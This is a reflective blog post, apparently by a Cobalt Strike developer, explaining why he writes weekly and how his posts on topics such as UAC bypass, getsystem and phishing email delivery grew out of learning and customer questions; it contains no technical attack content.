I try to blog once each week; that’s my goal. Sometimes, I feel like writing and I draft several posts at once. It takes awhile to make a post suitable to publish. Right now, I have hundreds of posts in various draft states. Each week, I try to find the one that is close to publishable and I fix it up.

seriously

I blog each week because this is my signal to you that I’m alive. When I evaluate a company, I look at two things. I look at the footer of their website to see the copyright date. I then look at their blog. If the copyright date says 2007 or if their blog is dead, I assume that the company is dead. I don’t want to be that company, so I pay attention to these two things. The rest is gravy.

I write a lot of posts about basic penetration testing and Metasploit Framework stuff. Someone on Reddit once commented that some of my posts have a lot of insight, but others are hacking 101. There’s a reason for this…

It’s probably no surprise, but I don’t know everything about hacking or how different hacking techniques work. I’ve met many who claim they do. I’m not as good as these amazing geniuses among us. I’m learning every day. I watch presentations, I read source code, and I conduct experiments. Cobalt Strike is a great driver of this, as most features I implement require me to learn something new. It’s a lot of fun.

Several of my blog posts capture the essence of something I learned. My popular Bypass UAC blog post summarizes what I learned implementing this feature into Cobalt Strike’s Beacon. I didn’t understand this attack and the left and right bounds of it before this work. I reckoned that if the material were new to me, it’s new to someone else. So, I took the time to write about.

My recent post on getsystem falls along the same lines. I knew how to type getsystem. I understand what SYSTEM is. I didn’t understand what happened when I typed the command. I was surprised by what I found out. I wrote a blog post on it.

Other blog posts come from customer questions. Semi-regularly, I would get exasperated support requests from someone who had trouble sending a phish to their Gmail account. I tired of trying to rapid-fire explain email delivery on a case-by-case basis. I wrote a blog post about Email Delivery and spent a lot of time on issues that affect penetration testers. Writing this post wasn’t a simple matter of transferring my knowledge into the written word. I had to verify everything I wrote. During this process, I found that my understanding of some topics was off (e.g., my working knowledge of SPF was way off).

This verification is another reason I write and I teach. Both of these things keep me honest. Publishing code and writing are two ways to feel very naked. I know that if I misstate something or mislead someone, I will get called out. This is pretty intimidating. That said, if I can’t handle that intimidation, I probably have no business developing tools that other experts use to do an important job. So, I take it in stride.

Some blogs posts summarize my experiences. I care a lot about operations. I like to reflect on how people work, how things work, and how tools can work together and complement each other. When it’s appropriate to do so, I use this blog as a place to share my experiences about how I use my tools, how others use them, and different ways to organize a team. I think it’s important for tool developers to ground themselves in the reality of how people use and react to their tools. I spend a lot of time using my tools with other professionals to keep myself grounded.

My regular use of Cobalt Strike is what gives me so much confidence in this toolset. I see it do amazing things all of the time. Some days, I can’t believe I’m the one who works on it.

In terms of audience, I primarily write for the people who already read this blog. I used to have a keen interest in attracting attention for each post. I’d measure a post’s success by how many views it received in its first day. This pressure took some of the fun away from writing and it restricted me from writing what interested me. I won’t say I have more readers since this change—I don’t. But, freeing myself from this metric allows me to write with more candor. That’s how this blog ends up with posts like this one. It satisfies my weekly goal, allows me to say something I wanted to share, and do so in a way that’s free from any expectations.

So, what’s this blog about? It’s a signal that I’m alive and working on your behalf. It’s also an opportunity to share what I’m learning as I go.

Follow

Get every new post delivered to your Inbox.

Join 14,008 other followers